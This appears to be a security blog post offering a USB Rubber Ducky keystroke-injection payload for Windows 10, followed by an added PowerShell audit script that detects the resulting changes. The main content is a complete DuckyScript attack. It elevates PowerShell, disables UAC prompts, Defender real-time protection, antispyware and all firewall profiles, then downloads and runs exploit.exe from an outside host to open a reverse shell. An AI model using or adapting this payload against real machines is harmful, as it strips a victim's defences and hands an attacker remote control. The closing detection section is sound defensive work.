USB HID – Rubber Duck Payload – Auto Turn Off UAC, Firewall, & Defender at Windows 10 & Connect to Reverse Shell in 10 sec

In the name of Allah, the Most Gracious, the Most Merciful.


Description: A simple Rubber Duck payload for disabling Windows UAC, Windows Firewall, and Windows Defender.

This PoC shows how to automatically turn off Windows UAC, Windows Firewall, and Windows Defender on Windows 10, and then connect back to the attacker machine via a reverse shell, within (or in less than) 10 seconds using a USB HID attack.

This payload also includes a step that downloads a file from a server and executes it automatically. Note that in the PoC video, that file was a reverse shell which connects back to the attacker machine when executed on the victim OS.

In general, this script can also be used for end-user security awareness sessions or as part of a red-team scenario.


PoC Script: https://github.com/yokokho/another-rubber-duck-payloads/blob/master/payload/Turn-Off-UAC-ETC.md


Auto Turn Off UAC, Firewall, & Defender at Windows 10 & Connect to Reverse Shell in 10 sec – USB HID

The Payload:

The payload is not an original one; it combines one existing payload with another.

Please note that this payload executes in about 10 seconds. It could be tuned to run in less than 10 seconds, since the delays are set to around 1000 – 1500 ms.

REM Automate Turn-Off - Windows UAC, Windows Firewall, and Windows Defender
REM Also automate to Download the malware and connect with Reverse Shell
GUI r
DELAY 1000
REM Open the Powershell as Administrator
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 1500
ALT y
ENTER
DELAY 1000
REM Disabling the UAC
STRING Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
ENTER
DELAY 1000
REM Disabling Defender Real-Time Monitoring
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
REM Disabling the Firewall on all profiles
STRING Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
ENTER
DELAY 1000
REM Disabling the Virus and Threat Protection
STRING New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
ENTER
DELAY 1000
REM Moving into C Directory
STRING cd C:\
ENTER
REM Download the Prepared Malware
STRING $WC = New-Object System.Net.WebClient
ENTER
STRING $WC.DownloadFile("http://192.168.13.129/exploit.exe","C:\exploit.exe")
ENTER
DELAY 500
REM Execute the Downloaded Malware
STRING .\exploit.exe
ENTER
DELAY 1000
ENTER
STRING exit
ENTER

Additional Note:

  • It can run in less than 10 seconds (depending on the DELAY values in the script).
  • This script was uploaded to one of the Arduino board series.
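Every change this payload makes is a persistent, queryable setting, so a defender can audit a host for exactly these four indicators. The following is an added example (not part of the original post) that checks the same registry values, Defender preference, and firewall profiles the payload touches and reports any that are in the tampered state; it assumes an elevated PowerShell session on Windows 10 with the Defender and NetSecurity modules present.

```powershell
# Added example: audit a host for the settings the payload above changes.
# Run from an elevated PowerShell prompt; returns a list of findings (empty = nothing tampered).
function Get-PayloadTamperIndicators {
    $findings = @()

    # 1. UAC: ConsentPromptBehaviorAdmin = 0 means administrators elevate with no prompt at all.
    $uac = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' `
        -Name ConsentPromptBehaviorAdmin -ErrorAction SilentlyContinue
    if ($uac -and $uac.ConsentPromptBehaviorAdmin -eq 0) {
        $findings += 'UAC: ConsentPromptBehaviorAdmin is 0 (elevation without prompt)'
    }

    # 2. Defender real-time monitoring (what Set-MpPreference -DisableRealtimeMonitoring $true turns off).
    $mp = Get-MpPreference -ErrorAction SilentlyContinue
    if ($mp -and $mp.DisableRealtimeMonitoring) {
        $findings += 'Defender: real-time monitoring is disabled'
    }

    # 3. Firewall profiles (the payload disables Domain, Public and Private in one call).
    Get-NetFirewallProfile -ErrorAction SilentlyContinue | ForEach-Object {
        if ($_.Enabled -eq 'False') {
            $findings += "Firewall: profile '$($_.Name)' is disabled"
        }
    }

    # 4. Defender policy key DisableAntiSpyware = 1 (the New-ItemProperty step).
    $pol = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' `
        -Name DisableAntiSpyware -ErrorAction SilentlyContinue
    if ($pol -and $pol.DisableAntiSpyware -eq 1) {
        $findings += 'Defender: policy value DisableAntiSpyware is 1'
    }

    return $findings
}

$result = Get-PayloadTamperIndicators
if ($result.Count -eq 0) { 'No tampering indicators found.' } else { $result }
```

Because the payload types these commands into an interactive PowerShell window, PowerShell script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) will also record the literal Set-MpPreference, Set-NetFirewallProfile and DisableAntiSpyware strings, which makes a good complementary detection source.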
